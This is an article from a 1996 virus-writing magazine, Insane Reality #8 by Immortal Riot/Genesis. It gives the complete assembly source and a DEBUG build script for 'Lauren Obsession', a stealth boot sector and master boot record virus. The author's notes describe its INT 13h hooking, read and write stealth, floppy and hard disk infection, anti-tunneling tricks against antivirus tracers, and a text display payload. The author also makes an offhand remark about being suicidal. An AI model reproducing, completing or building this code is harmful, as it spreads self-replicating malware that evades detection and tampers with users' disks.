Insane Reality issue #8 - (c)opyright 1996 Immortal Riot/Genesis - REALITY.023 Article: Lauren Obsession Author: Methyl [IRG] % Lauren Obsession virus by Methyl [IRG] % __________________________________________ Yet another contribution from Methyl, just read his notes to see what this virus does. - _Sepultura_ ;=[BEGIN LAUREN.ASM]========================================================= ; [ Lauren Obsession ] ; ; Welcome :) In an effort to fill up spaces in IR#8 so we don't have to ; sink so low as to include heaps of code from outsiders who aren't members ; into our magazine... and also in an effort to prove I can do more than just ; write tunneling documents... and ALSO to dedicate a virus to someone who I ; luvvels very much and who luvvels me back just as much... as WELL AS to ; gain some more recognition as being and member of [IR/G]... I decided to ; write Lauren Obsession!!!! Phew! I have alot of motives don't I? :) ; ; Anyway, this virus isn't exactly the tightest or highest quality code ; you'll see in this magazine... hey... *I* wrote it... I can never seem to ; code as tightly as other members... nor have I written any viruses lately ; simply because I'm too busy with tunneling and so am a bit rusty on assembly ; skills, but, enough excuses :) If you don't like this virus... then I can ; tell you where you can shove it! ; ; This is a simple full stealth (on i13 read and write functions) boot ; sector / master boot record infector. Unlike some lesser infectors of this ; type, if the virus isn't resident in memory and DOS tries to read an infected ; floppy disk... the disk reads okay because all original disk information ; recorded in the MBR is kept safe. Also, on bootup from non-infected floppy ; disks, the hard disk is inaccessable by DOS (although you can still scan ; it with F-PROT using the /HARD option). This is a pretty standard feature ; in viruses anyway. To make myself less bored, there is a tiny activation ; routine which is where the virus gets its name from (wink wink, hehe), and ; also, the virus contains some anti-tunneling code because... hey... why not ; do something I'm good at eh? ; ; This virus does not agree with windows nor windows 95 nor windows nt, ; and neither does many other boot sector viruses. I don't have the space in ; here to make it compatable with windows... not the time, althought looking ; at goldbug (which does do this) it doesn't look hard. Anyway, if you run ; either system, tough ;) Also, it will trigger off any anti-virus software ; your BIOS may be running... oh well. Otherwise the virus has no bugs. Not ; that the problems I just described would be classified as 'bugs'. ; ; Methyl [Immortal Riot/Genesis] ; ; P.S. Don't be thrown off by the smiley faces... they are not literal... ; the show that I -WOULD- be smiling if I was a normal person, but, ; I'm suicidal, not normal, I don't really smile so leave me alone. ; ;;;;; bootstrap code begins here org 0000 VSTART: jmp short after_bpb db 03ch dup(?) after_bpb: mov bp, dx ; this is important ;) xor ax, ax mov bx, 07c00h mov ss, ax mov sp, bx ; setup STACK mov ds, ax mov es, ax mov si, (013h*4) mov di, (07c00h+ORIG_13) cld movsw movsw ; copy original i13 handler address int 012h dec ax mov [0413h], ax ; decrease memory size as reported in BIOS mov cl, 6 shl ax, cl push ax mov es, ax mov si, bx xor di, di mov cx, 0100h rep movsw ; move us to TOM lea ax, [resident] push ax ; save a return address for when we transfer to TOM retf ; jump to ourselves at the TOM resident: mov w[013h*4], offset interrupt_13 mov [(013h*4)+2], cs mov al, [0417h] test al, 0100xb ; is left control pressed down? jnz i_love_lauren mov dx, bp ; reload boot sector from the active disk :) <-- rox joo int 019h ; reboot with us resident ;) ;;;;; display procedure begins here i_love_lauren: xor ax, ax mov ax, 0b800h mov es, ax xor di, di lea si, [MESSAGE+07c00h] display_loop: call slow_me_down movsw cmp di, 4000 jne after_di reset_di: xor di, di after_di: cmp si, (offset AX_VALUE+07c00h) jne display_loop reset_si: lea si, [MESSAGE+07c00h] jmp short display_loop slow_me_down: mov cx, 08000h slow_me_loop: loop slow_me_loop ; makes it a nice speed on my slow computer ret ;;;;; i13 handler begins here interrupt_13: push ds push si push ax mov ax, 0eah ; kill the less ereet of code tracers xor ax, ax mov ds, ax push [4] push [6] pop ds pop si mov al, 0cfh xchg [ds:si], al ; kill single step tunnelers mov b[cs:ANTI_TRACE], al pop ax mov [cs:AX_VALUE], ax call call_13 pushf xchg [cs:AX_VALUE], ax push cx push dx jc interrupt_13_exit cmp cx, 1 jne interrupt_13_exit ; exit if not sector 1 or dh, dh jnz interrupt_13_exit ; exit if not track 0 cmp ah, 2 je read_13 ; read stealth cmp ah, 3 je try_to_infect ; write stealth (infection) interrupt_13_exit: xor ax, ax mov ds, ax push [4] push [6] pop ds pop si mov al, b[cs:ANTI_TRACE] mov [ds:si], al ; re-enable single step tunnelers pop dx pop cx popf pop si pop ds xchg ax, [cs:AX_VALUE] retf 2 ; return to code which called us ;;;;; read stealth begins here read_13: call check_boot jne try_to_infect cmp dx, 080h je read_13_hard mov dh, 1 mov cx, [cs:SEC_INFO+0200h] jmp short read_redirect read_13_hard: mov cx, 5 read_redirect: mov ax, 0201h call call_13 ; overwrite the first sector of the read ; buffer with the original boot sector jc read_redirect ; re-read if error (this will NOT hang us) jmp interrupt_13_exit ;;;;; write stealth/infection routine begins here try_to_infect: push bx push es call check_boot ; get original boot sector into memory push si push di mov ax, cs mov ds, ax mov es, ax mov si, (514) mov di, 2 cld mov cx, 03ch rep movsb ; save data area over our data area pop di pop si cmp dl, 080h jae hard_infect ; jump to hard disk routine if needed mov dh, 1 push dx mov bx, cs:[0211h] mov cl, 4 shr bx, cl mov ah, 0 mov al, cs:[0210h] mul w[cs:0216h] add ax, bx xchg cx, ax inc cx sub cx, w[cs:0218h] ; calculate last sector in directory pop dx mov w[cs:DRV_INFO], 0 jmp short after_disks hard_infect: mov w[cs:DRV_INFO], 080h mov cx, 5 ; setup for hard disk infection after_disks: mov ax, 0301h mov es, cs mov bx, 512 mov cs:[SEC_INFO], cx call call_13 ; write original B/S to directory mov ax, 0301h xor bx, bx mov dh, 0 mov cx, 1 call call_13 ; write us to disk B/S pop es pop bx jmp short interrupt_13_exit ;;;;; various procedures begin here check_boot: push es push bx check_boot_retry: mov ax, 0201h mov es, cs mov bx, 0200h call call_13 jc check_boot_retry ; re-read if error (this will NOT hang us) cmp b[es:0200h+offset MESSAGE], 'C' pop bx pop es ret call_13: pushf db 09ah ORIG_13: dw 0, 0 ; used to call original BIOS i13 handler ret ;;;;; data area begins here MESSAGE: db 'C', 03H, 'o', 03H, 'd', 03H, 'y', 03H, ' ', 03H, ' ', 03H, 3, 12 db '''', 03H, 's', 03H, ' ', 03H, ' ', 03H, 'L', 03H, 'a', 03H, 'u' db 03H, 'r', 03H, 'e', 03H, 'n', 03H, ' ', 03H, ' ', 03H, 3, 12, '''' db 03H, 's', 03H, ' ', 03H, ' ', 03H AX_VALUE dw 0 SEC_INFO dw 5 DRV_INFO dw 080h ANTI_TRACE: db 0 VEND: DB 055H, 0AAH ; marker to indicate a bootable disk ;=[END LAUREN.ASM]=========================================================== ;=[BEGIN LAUREN.SCR]========================================================= N LAUREN.BIN E 0100 EB 3C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8B EA E 0140 33 C0 BB 00 7C 8E D0 8B E3 8E D8 8E C0 BE 4C 00 E 0150 BF C2 7D FC A5 A5 CD 12 48 A3 13 04 B1 06 D3 E0 E 0160 50 8E C0 89 DE 33 FF B9 00 01 F3 A5 B8 71 00 50 E 0170 CB C7 06 4C 00 AF 00 8C 0E 4E 00 A0 17 04 A8 04 E 0180 75 04 8B D5 CD 19 33 C0 B8 00 B8 8E C0 33 FF BE E 0190 C7 7D E8 14 00 A5 81 FF A0 0F 75 02 33 FF 81 FE E 01A0 F7 7D 75 EE BE C7 7D EB E9 B9 00 80 E2 FE C3 1E E 01B0 56 50 B8 EA 00 33 C0 8E D8 FF 36 04 00 FF 36 06 E 01C0 00 1F 5E B0 CF 86 04 2E A2 FD 01 58 2E A3 F7 01 E 01D0 E8 ED 00 9C 2E 87 06 F7 01 51 52 72 13 83 F9 01 E 01E0 75 0E 0A F6 75 0A 80 FC 02 74 26 80 FC 03 74 42 E 01F0 33 C0 8E D8 FF 36 04 00 FF 36 06 00 1F 5E 2E A0 E 0200 FD 01 88 04 5A 59 9D 5E 1F 2E 87 06 F7 01 CA 02 E 0210 00 E8 94 00 75 1C 81 FA 80 00 74 09 B6 01 2E 8B E 0220 0E F9 03 EB 03 B9 05 00 B8 01 02 E8 92 00 72 F8 E 0230 EB BE 53 06 E8 71 00 56 57 8C C8 8E D8 8E C0 BE E 0240 02 02 BF 02 00 FC B9 3C 00 F3 A4 5F 5E 80 FA 80 E 0250 73 2A B6 01 52 2E 8B 1E 11 02 B1 04 D3 EB B4 00 E 0260 2E A0 10 02 2E F7 26 16 02 01 D8 91 41 2E 2B 0E E 0270 18 02 5A 2E C7 06 FB 01 00 00 EB 0A 2E C7 06 FB E 0280 01 80 00 B9 05 00 B8 01 03 0E 07 BB 00 02 2E 89 E 0290 0E F9 01 E8 2A 00 B8 01 03 33 DB B6 00 B9 01 00 E 02A0 E8 1D 00 07 5B E9 48 FF 06 53 B8 01 02 0E 07 BB E 02B0 00 02 E8 0B 00 72 F3 26 80 3E C7 03 43 5B 07 C3 E 02C0 9C 9A 00 00 00 00 C3 43 03 6F 03 64 03 79 03 20 E 02D0 03 20 03 03 0C 27 03 73 03 20 03 20 03 4C 03 61 E 02E0 03 75 03 72 03 65 03 6E 03 20 03 20 03 03 0C 27 E 02F0 03 73 03 20 03 20 03 00 00 05 00 80 00 00 55 AA RCX 0200 W Q ;=[END LAUREN.SCR]===========================================================